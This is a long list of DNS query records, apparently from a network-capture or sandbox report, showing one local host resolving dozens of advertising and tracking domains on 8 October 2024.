                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.365397930 CEST192.168.2.41.1.1.10x3adcStandard query (0)api.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.385310888 CEST192.168.2.41.1.1.10x8d46Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.385445118 CEST192.168.2.41.1.1.10xd590Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.407917976 CEST192.168.2.41.1.1.10xa22cStandard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.408035040 CEST192.168.2.41.1.1.10xec09Standard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.485903025 CEST192.168.2.41.1.1.10x9480Standard query (0)idpix.media6degrees.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.486329079 CEST192.168.2.41.1.1.10x3f62Standard query (0)idpix.media6degrees.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.786381960 CEST192.168.2.41.1.1.10x9ba8Standard query (0)cdn.indexww.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.786509037 CEST192.168.2.41.1.1.10x5c1eStandard query (0)cdn.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.788322926 CEST192.168.2.41.1.1.10xbe08Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.788446903 CEST192.168.2.41.1.1.10x7e28Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.845110893 CEST192.168.2.41.1.1.10x631dStandard query (0)sync.go.sonobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.845345974 CEST192.168.2.41.1.1.10x3aaStandard query (0)sync.go.sonobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.958789110 CEST192.168.2.41.1.1.10x8f63Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.959049940 CEST192.168.2.41.1.1.10x45e2Standard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.964224100 CEST192.168.2.41.1.1.10xeee4Standard query (0)rtb.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.964385986 CEST192.168.2.41.1.1.10x2c6cStandard query (0)rtb.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.974909067 CEST192.168.2.41.1.1.10xeeecStandard query (0)sync.serverbid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.975236893 CEST192.168.2.41.1.1.10xba38Standard query (0)sync.serverbid.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.295337915 CEST192.168.2.41.1.1.10x2385Standard query (0)sync.mathtag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.295535088 CEST192.168.2.41.1.1.10x81f7Standard query (0)sync.mathtag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.301327944 CEST192.168.2.41.1.1.10x2a95Standard query (0)us.creativecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.301462889 CEST192.168.2.41.1.1.10x71f6Standard query (0)us.creativecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.302021980 CEST192.168.2.41.1.1.10xf6cStandard query (0)rtb.adentifi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.302253962 CEST192.168.2.41.1.1.10xdcf0Standard query (0)rtb.adentifi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.503691912 CEST192.168.2.41.1.1.10x1b17Standard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.503909111 CEST192.168.2.41.1.1.10x2e97Standard query (0)api.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.672317028 CEST192.168.2.41.1.1.10xcfb2Standard query (0)gw-iad-bid.ymmobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.672499895 CEST192.168.2.41.1.1.10xbc12Standard query (0)gw-iad-bid.ymmobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.686434984 CEST192.168.2.41.1.1.10xc5acStandard query (0)sync.mathtag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.687465906 CEST192.168.2.41.1.1.10xc7adStandard query (0)sync.mathtag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.691939116 CEST192.168.2.41.1.1.10x15a8Standard query (0)us.creativecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.692260027 CEST192.168.2.41.1.1.10x86cStandard query (0)us.creativecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.692476988 CEST192.168.2.41.1.1.10x25a2Standard query (0)rtb.adentifi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.693638086 CEST192.168.2.41.1.1.10x1d09Standard query (0)rtb.adentifi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.898324966 CEST192.168.2.41.1.1.10xc38eStandard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.898467064 CEST192.168.2.41.1.1.10x6057Standard query (0)api.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.914819002 CEST192.168.2.41.1.1.10x3418Standard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.915247917 CEST192.168.2.41.1.1.10xe8d0Standard query (0)static.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.270486116 CEST192.168.2.41.1.1.10xad5eStandard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.270673990 CEST192.168.2.41.1.1.10x1dc1Standard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.302623034 CEST192.168.2.41.1.1.10x2f83Standard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.303072929 CEST192.168.2.41.1.1.10x36e6Standard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.780083895 CEST192.168.2.41.1.1.10x32f4Standard query (0)cdn.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.780278921 CEST192.168.2.41.1.1.10xef52Standard query (0)cdn.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.910873890 CEST192.168.2.41.1.1.10x3382Standard query (0)sync.adkernel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.911406040 CEST192.168.2.41.1.1.10x1be0Standard query (0)sync.adkernel.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.934226990 CEST192.168.2.41.1.1.10xccbaStandard query (0)u.ipw.metadsp.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.934333086 CEST192.168.2.41.1.1.10xb765Standard query (0)u.ipw.metadsp.co.uk65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.085458994 CEST192.168.2.41.1.1.10xc7e2Standard query (0)simage2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.085731030 CEST192.168.2.41.1.1.10xf51Standard query (0)simage2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.282206059 CEST192.168.2.41.1.1.10xf97cStandard query (0)t.adx.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.282337904 CEST192.168.2.41.1.1.10x7a0aStandard query (0)t.adx.opera.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.531286001 CEST192.168.2.41.1.1.10x3c55Standard query (0)dsp-cookie.adfarm1.adition.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.531408072 CEST192.168.2.41.1.1.10xc0f4Standard query (0)dsp-cookie.adfarm1.adition.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.554871082 CEST192.168.2.41.1.1.10x9009Standard query (0)dsp-ap.eskimi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.555047989 CEST192.168.2.41.1.1.10xa821Standard query (0)dsp-ap.eskimi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.742345095 CEST192.168.2.41.1.1.10x2019Standard query (0)sync.1rx.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.742512941 CEST192.168.2.41.1.1.10x1f52Standard query (0)sync.1rx.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.806196928 CEST192.168.2.41.1.1.10xa130Standard query (0)onetag-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.806380033 CEST192.168.2.41.1.1.10x574Standard query (0)onetag-sys.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.876657963 CEST192.168.2.41.1.1.10xb494Standard query (0)csync.loopme.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.876849890 CEST192.168.2.41.1.1.10xb833Standard query (0)csync.loopme.me65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.894144058 CEST192.168.2.41.1.1.10xbe26Standard query (0)d5p.de17a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.894349098 CEST192.168.2.41.1.1.10x4cc4Standard query (0)d5p.de17a.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.047605038 CEST192.168.2.41.1.1.10x9fafStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.047947884 CEST192.168.2.41.1.1.10x2257Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.050225973 CEST192.168.2.41.1.1.10xab11Standard query (0)aa.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.050383091 CEST192.168.2.41.1.1.10xf6baStandard query (0)aa.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.076082945 CEST192.168.2.41.1.1.10xcbedStandard query (0)c.betrad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.076206923 CEST192.168.2.41.1.1.10x5011Standard query (0)c.betrad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.082942963 CEST192.168.2.41.1.1.10xc776Standard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.083137989 CEST192.168.2.41.1.1.10x751fStandard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.085720062 CEST192.168.2.41.1.1.10xea39Standard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.085896969 CEST192.168.2.41.1.1.10x9beeStandard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.097796917 CEST192.168.2.41.1.1.10xad5bStandard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.097922087 CEST192.168.2.41.1.1.10x6bb2Standard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.100861073 CEST192.168.2.41.1.1.10xacecStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.101165056 CEST192.168.2.41.1.1.10x963dStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.243470907 CEST192.168.2.41.1.1.10x6b28Standard query (0)ipac.ctnsnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.243602991 CEST192.168.2.41.1.1.10xefd3Standard query (0)ipac.ctnsnet.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.244241953 CEST192.168.2.41.1.1.10x77b9Standard query (0)pool.admedo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.244503021 CEST192.168.2.41.1.1.10xcdaeStandard query (0)pool.admedo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.272078991 CEST192.168.2.41.1.1.10x712eStandard query (0)d.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.272501945 CEST192.168.2.41.1.1.10x38f8Standard query (0)d.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.358001947 CEST192.168.2.41.1.1.10x2a3dStandard query (0)ad.mrtnsvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.358133078 CEST192.168.2.41.1.1.10x7814Standard query (0)ad.mrtnsvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.391113997 CEST192.168.2.41.1.1.10x2f17Standard query (0)dsp.360yield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.391258955 CEST192.168.2.41.1.1.10x487Standard query (0)dsp.360yield.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.478919983 CEST192.168.2.41.1.1.10xcb66Standard query (0)core.iprom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.479199886 CEST192.168.2.41.1.1.10x7d9fStandard query (0)core.iprom.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.512002945 CEST192.168.2.41.1.1.10xb19aStandard query (0)cr.frontend.weborama.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.512164116 CEST192.168.2.41.1.1.10x49c7Standard query (0)cr.frontend.weborama.fr65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.513654947 CEST192.168.2.41.1.1.10xfed0Standard query (0)mwzeom.zeotap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.513782978 CEST192.168.2.41.1.1.10x75a1Standard query (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.516602993 CEST192.168.2.41.1.1.10x62dbStandard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.516937017 CEST192.168.2.41.1.1.10x9d05Standard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.619221926 CEST192.168.2.41.1.1.10xed93Standard query (0)bttrack.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.619595051 CEST192.168.2.41.1.1.10x3a50Standard query (0)bttrack.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.706110954 CEST192.168.2.41.1.1.10x5457Standard query (0)rtb0.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.706377983 CEST192.168.2.41.1.1.10xe17eStandard query (0)rtb0.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.354310036 CEST192.168.2.41.1.1.10x24deStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.354680061 CEST192.168.2.41.1.1.10xf502Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.563045025 CEST192.168.2.41.1.1.10xee22Standard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.563186884 CEST192.168.2.41.1.1.10xfe64Standard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.598840952 CEST192.168.2.41.1.1.10x3680Standard query (0)cdn.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.599056959 CEST192.168.2.41.1.1.10xfa0eStandard query (0)cdn.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.627284050 CEST192.168.2.41.1.1.10xb42bStandard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.627429008 CEST192.168.2.41.1.1.10xfee6Standard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.046839952 CEST192.168.2.41.1.1.10x6aecStandard query (0)s.seedtag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.046951056 CEST192.168.2.41.1.1.10x10e6Standard query (0)s.seedtag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.047410011 CEST192.168.2.41.1.1.10x7d35Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.047544003 CEST192.168.2.41.1.1.10xc7d2Standard query (0)match.sharethrough.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.222091913 CEST192.168.2.41.1.1.10xf248Standard query (0)cms.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.222242117 CEST192.168.2.41.1.1.10x8c5Standard query (0)cms.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.270389080 CEST192.168.2.41.1.1.10xcfc4Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.275293112 CEST192.168.2.41.1.1.10x8e1bStandard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.457835913 CEST192.168.2.41.1.1.10x49c4Standard query (0)tps.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.457993984 CEST192.168.2.41.1.1.10xd946Standard query (0)tps.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.748462915 CEST192.168.2.41.1.1.10xba9aStandard query (0)c.evidon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.748588085 CEST192.168.2.41.1.1.10x6b77Standard query (0)c.evidon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.751349926 CEST192.168.2.41.1.1.10xf5daStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.751579046 CEST192.168.2.41.1.1.10x6b5aStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.900238037 CEST192.168.2.41.1.1.10x2adeStandard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.900553942 CEST192.168.2.41.1.1.10x9dd0Standard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.076162100 CEST192.168.2.41.1.1.10xe600Standard query (0)tps.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.076420069 CEST192.168.2.41.1.1.10x1aabStandard query (0)tps.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.108979940 CEST192.168.2.41.1.1.10x255cStandard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.109392881 CEST192.168.2.41.1.1.10xbb55Standard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.436222076 CEST192.168.2.41.1.1.10xd718Standard query (0)c.evidon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.436389923 CEST192.168.2.41.1.1.10x1db2Standard query (0)c.evidon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.504143953 CEST192.168.2.41.1.1.10x6f19Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.504525900 CEST192.168.2.41.1.1.10xcc2eStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.950997114 CEST192.168.2.41.1.1.10x9297Standard query (0)sync-pm.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.951248884 CEST192.168.2.41.1.1.10x2879Standard query (0)sync-pm.ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.960824966 CEST192.168.2.41.1.1.10x43f7Standard query (0)noa.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.961347103 CEST192.168.2.41.1.1.10x8eccStandard query (0)noa.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.329508066 CEST192.168.2.41.1.1.10xefa7Standard query (0)exchange.mediavine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.329669952 CEST192.168.2.41.1.1.10x9250Standard query (0)exchange.mediavine.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.457787991 CEST192.168.2.41.1.1.10x4a72Standard query (0)simage4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.457973957 CEST192.168.2.41.1.1.10xf082Standard query (0)simage4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.496978045 CEST192.168.2.41.1.1.10x19b2Standard query (0)pubmatic-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.497102976 CEST192.168.2.41.1.1.10xb508Standard query (0)pubmatic-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.654567003 CEST192.168.2.41.1.1.10x5d91Standard query (0)match.adsby.bidtheatre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.654721975 CEST192.168.2.41.1.1.10xe37cStandard query (0)match.adsby.bidtheatre.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.827989101 CEST192.168.2.41.1.1.10xd832Standard query (0)s2s.t13.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.828217030 CEST192.168.2.41.1.1.10xb240Standard query (0)s2s.t13.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.873754025 CEST192.168.2.41.1.1.10x1346Standard query (0)sync.targeting.unrulymedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.873864889 CEST192.168.2.41.1.1.10xdf48Standard query (0)sync.targeting.unrulymedia.com65IN (0x0001)false
